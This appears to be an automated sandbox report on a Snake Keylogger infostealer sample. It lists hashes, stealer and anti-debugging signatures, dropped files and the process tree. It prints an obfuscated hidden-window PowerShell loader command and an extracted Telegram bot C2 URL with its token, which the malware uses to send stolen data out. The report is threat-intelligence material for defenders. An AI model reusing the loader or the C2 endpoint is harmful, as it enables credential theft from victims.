Overview

overview

10

Static

static

3

SEM2024000002383.exe

windows7-x64

8

SEM2024000002383.exe

windows10-2004-x64

10

Synligstes84.ps1

windows7-x64

3

Synligstes84.ps1

windows10-2004-x64

8

Analysis

  • max time kernel
    298s
  • max time network
    274s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-10-2024 16:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SEM2024000002383.exe

  • Size

    748KB

  • MD5

    06fa51d68f2545f28a2b942b01a4bb13

  • SHA1

    74fb1ce042c1982155d6d190b446dd429c7ad463

  • SHA256

    fb79dfe6e2eebbe7882d3e688ff377c3ffcfc8d41f35e1af16f224846f4fab5b

  • SHA512

    a11d5b3fccfc2cf03913903382b2521b609bd2d798d50e6b151c8a88f1cb835456e0f1ace18c50037de6b93c656f51b88e783fb42b80b38fd3be0d772cc5c773

  • SSDEEP

    12288:jG6QMVyGP0Fx53cAA0jGnheowOyGOs61IYZVAecgs9FMa1Mdq8jJM:jG6QtGP0OhsGnheowDGMIYO7MoOM

Score
10/10
snakekeyloggercollectiondiscoveryexecutionkeyloggerspywarestealer

Malware Config

Extracted

Family

snakekeylogger

C2

https://api.telegram.org/bot7840943707:AAFvjApaxzyzfiy9tTVH4n-N6k-rIeMo504/sendMessage?chat_id=2129508827

Signatures

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Snake Keylogger payload 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 6 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SEM2024000002383.exe
    "C:\Users\Admin\AppData\Local\Temp\SEM2024000002383.exe"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5080
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Woodwaxen=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Synligstes84.Hig';$Fragtvogne=$Woodwaxen.SubString(6209,3);.$Fragtvogne($Woodwaxen)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1628
      • C:\Users\Admin\AppData\Local\Temp\sparekassebestyrere.exe
        "C:\Users\Admin\AppData\Local\Temp\sparekassebestyrere.exe"
        3⤵
        • Loads dropped DLL
        • Accesses Microsoft Outlook profiles
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3960
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Woodwaxen=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Synligstes84.Hig';$Fragtvogne=$Woodwaxen.SubString(6209,3);.$Fragtvogne($Woodwaxen)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3820
      • C:\Users\Admin\AppData\Local\Temp\sparekassebestyrere.exe
        "C:\Users\Admin\AppData\Local\Temp\sparekassebestyrere.exe"
        3⤵
        • Loads dropped DLL
        • Accesses Microsoft Outlook profiles
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:212

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199
    Filesize

    854B

    MD5

    e935bc5762068caf3e24a2683b1b8a88

    SHA1

    82b70eb774c0756837fe8d7acbfeec05ecbf5463

    SHA256

    a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d

    SHA512

    bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    1KB

    MD5

    43832069d8f03a5d73dc278fae3b35ea

    SHA1

    ff26203bf08efd341b9b7af5a691e6f3abd84822

    SHA256

    1e471a8afb34a6896632c7930b04f0aa6771aece3c7c97e270da8ab55970fb6f

    SHA512

    c66445de1b855578da64212bcd649fdfe0ab3ce43c6635614779f1ca656cb732458eac03e6a3119cb6aa3728ca85b791da68f1a9a2ab4b33b338f7bd89f7b194

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
    Filesize

    471B

    MD5

    55dd21411f214fc63eeacc240a6e8b61

    SHA1

    11374ef319aa8627dd65619e6e6f4886c6124bb7

    SHA256

    6b82653fabdf71adbeb51838b98136533d47c77991d73da6318d4fae61f0b0f5

    SHA512

    d6f585d48b85a45588f7ad4b24e0fe2a5894ea395b593fb9bb1f50644f3857bd25f8ba4b2aa370b9ed9e568b7bf6dce115cb9577ede452a9a8548d656cca55a5

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
    Filesize

    472B

    MD5

    bac80766bb58bd773b103a4901553ec8

    SHA1

    a70d9baf9bad99c2dc5b7c2651a7c37e676ff6b5

    SHA256

    8df55918cdbd2a47e6e3d059a8d81619347b7d251bf30cf93ad73820e3a9e6ea

    SHA512

    91796008239d01776728ac888f35a8cf9d85ff0d4c5e848b0dfba8b2be914b7c92378c9bf3928fc325dc7bcb46ebcf492deaf7776aee3421e5abf7acdebdc060

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
    Filesize

    170B

    MD5

    4b43cae227f8e3ef564abc2a95355d78

    SHA1

    8f5e711746c2d9b19a0e774b86b9f8ec29322b03

    SHA256

    98fdf444c3b172fe6d88c6b800e65b75f7d9310b00bdf78e5e04606962b511b3

    SHA512

    adfd5b82316e2a483f510b361f76a8544b88a31ca7c0f46df8b0a7a22a8a20dffd59d8b57561d014d0300f5b5e11bd0ca47325264c6c3efc6081ea5bfa4085c5

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
    Filesize

    410B

    MD5

    8a2a8390dd922844bae71c0cb0ee41cf

    SHA1

    96fe13a511e321fa98ab4ed959239f132b7c59eb

    SHA256

    5bffb8531b3f8acac71370d57c1c7cd9861ade37bec98d51f70eda9254a2437b

    SHA512

    6ddad4821427c77c08aada55928e7ce8d4639376afaef9e0995a8e7a6b3d95215d4e401e3d3b694ae03f6cb9fcf303f60127b58ff52f8dc6c472b13ea7a371ca

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
    Filesize

    406B

    MD5

    6f2b262117319a118c349ca27f9df68c

    SHA1

    d5137693b1b330dcac62f4f0ef915eaaac62e708

    SHA256

    416659123759ffe9f2758a92f612839732fde56f429b2595a1547bd2ae903a32

    SHA512

    af868e026ed2ddc02889db0d128baf1e7a8a4fc993914fa045b2da6135be3c9a3cf503d43fbf059c67bb39879076405b9999c9de7226a0bd3da7165dd2299355

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
    Filesize

    406B

    MD5

    e80795b255a395eb46d2573798c6d3a2

    SHA1

    f7585628d63ae6bdc3f7fa9a9b27389d77de50f6

    SHA256

    99fee4cbfec745331c2937cece469a12aa0810423113acda3d290c5c15e55c76

    SHA512

    7a470959a85635fdc8f67efa89e95aca8ee130e9427aefef7c9d5da4b1d699a4c8bfb4135b27fa11f1c63eceb74e87a154e7492278eed7cd4c4eb5ca2b1bbe7d

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
    Filesize

    402B

    MD5

    f2330b5a53480eab2213d1223e54ce0b

    SHA1

    2de076fb51dcb8b2d8241f5fd1c4cc19c48dd860

    SHA256

    d302186c873c733dbcef74cb94909d3968f0e28ff14468a3ae2c0304add94b11

    SHA512

    d6a3a7e4b43ad4067345cdc7a6e6516e768e0d3e19cfd8bb9178b31b65b7cf02ab59231c7e1cc005d7e2b4929242bd10f59f4113567d2fbff245de48a69ddc74

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bbbkfnoc.0ty.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\sparekassebestyrere.exe
    Filesize

    748KB

    MD5

    06fa51d68f2545f28a2b942b01a4bb13

    SHA1

    74fb1ce042c1982155d6d190b446dd429c7ad463

    SHA256

    fb79dfe6e2eebbe7882d3e688ff377c3ffcfc8d41f35e1af16f224846f4fab5b

    SHA512

    a11d5b3fccfc2cf03913903382b2521b609bd2d798d50e6b151c8a88f1cb835456e0f1ace18c50037de6b93c656f51b88e783fb42b80b38fd3be0d772cc5c773

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Artiskokkerne.Pol
    Filesize

    306KB

    MD5

    e722a2a3f5a340e2b87e12ec6a1f33a5

    SHA1

    b0c047440e053e3ec01d6d94cc1f21663294dd27

    SHA256

    4c2064e7a4e41fe147b87eb6e298bb93133b9b2334d143a1b18ec5758ac487fc

    SHA512

    a8359b0abc35dd980cda9a117ed85bc622df00ad827c0afa7c185270869404fbcc4e43c8640b1c5aee1f4048c100d375372bbc80410fecf747f2717ff266a26a

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\superincomprehensible\Synligstes84.Hig
    Filesize

    53KB

    MD5

    453a8e6a5068ae5a2e5d99de31a13b3b

    SHA1

    9f202a5b9a8cf1ae90030e14ea99c4e787338ede

    SHA256

    4ac6b7ddcc88b43191a8e1329e632c3246b10dcd077b1e79efa2f0559cafa7f6

    SHA512

    37b6296b2434b1791d7e709d17cd8bcce6d8111505648b63227e1004461de31d07922497ed80be4e6ab115ece2964394cf6a3c1b26725a3da2fa0bb3cf7cac46

    Download Submit

  • memory/1628-44-0x00000000075B0000-0x00000000075E2000-memory.dmp

    Filesize

    200KB

    Download

  • memory/1628-16-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1628-39-0x0000000006640000-0x000000000665A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/1628-40-0x00000000066B0000-0x00000000066D2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1628-8-0x0000000002BB0000-0x0000000002BE6000-memory.dmp

    Filesize

    216KB

    Download

  • memory/1628-41-0x0000000007A60000-0x0000000008004000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/1628-7-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1628-9-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1628-46-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1628-12-0x0000000005550000-0x0000000005B78000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/1628-36-0x0000000006170000-0x000000000618E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1628-58-0x0000000007590000-0x00000000075AE000-memory.dmp

    Filesize

    120KB

    Download

  • memory/1628-96-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1628-47-0x0000000070520000-0x0000000070874000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/1628-71-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1628-88-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1628-86-0x0000000008D10000-0x000000000E86B000-memory.dmp

    Filesize

    91.4MB

    Download

  • memory/1628-85-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1628-45-0x000000006FDA0000-0x000000006FDEC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/1628-81-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/1628-74-0x00000000078B0000-0x00000000078DA000-memory.dmp

    Filesize

    168KB

    Download

  • memory/1628-75-0x00000000078E0000-0x0000000007904000-memory.dmp

    Filesize

    144KB

    Download

  • memory/1628-76-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3820-11-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3820-38-0x0000000006380000-0x0000000006416000-memory.dmp

    Filesize

    600KB

    Download

  • memory/3820-13-0x0000000004E90000-0x0000000004EB2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3820-14-0x0000000005620000-0x0000000005686000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3820-83-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3820-84-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3820-73-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3820-72-0x00000000073F0000-0x00000000073FA000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3820-70-0x00000000072D0000-0x0000000007373000-memory.dmp

    Filesize

    652KB

    Download

  • memory/3820-89-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3820-90-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3820-49-0x000000006FDA0000-0x000000006FDEC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3820-95-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3820-10-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3820-15-0x00000000056D0000-0x0000000005736000-memory.dmp

    Filesize

    408KB

    Download

  • memory/3820-6-0x000000007391E000-0x000000007391F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3820-80-0x000000007391E000-0x000000007391F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3820-61-0x0000000073910000-0x00000000740C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/3820-37-0x0000000005E80000-0x0000000005ECC000-memory.dmp

    Filesize

    304KB

    Download

  • memory/3820-59-0x0000000070520000-0x0000000070874000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3820-43-0x00000000080D0000-0x000000000874A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/3820-22-0x0000000005840000-0x0000000005B94000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/3960-142-0x0000000026740000-0x000000002674A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/3960-133-0x0000000000470000-0x00000000016C4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/3960-134-0x0000000000470000-0x00000000016C4000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/3960-136-0x0000000000470000-0x0000000000496000-memory.dmp

    Filesize

    152KB

    Download

  • memory/3960-137-0x0000000025EB0000-0x0000000025F4C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/3960-139-0x0000000026440000-0x0000000026490000-memory.dmp

    Filesize

    320KB

    Download

  • memory/3960-140-0x0000000026490000-0x0000000026652000-memory.dmp

    Filesize

    1.8MB

    Download

  • memory/3960-141-0x0000000026660000-0x00000000266F2000-memory.dmp

    Filesize

    584KB

    Download

  • memory/3960-98-0x0000000000470000-0x00000000016C4000-memory.dmp

    Filesize

    18.3MB

    Download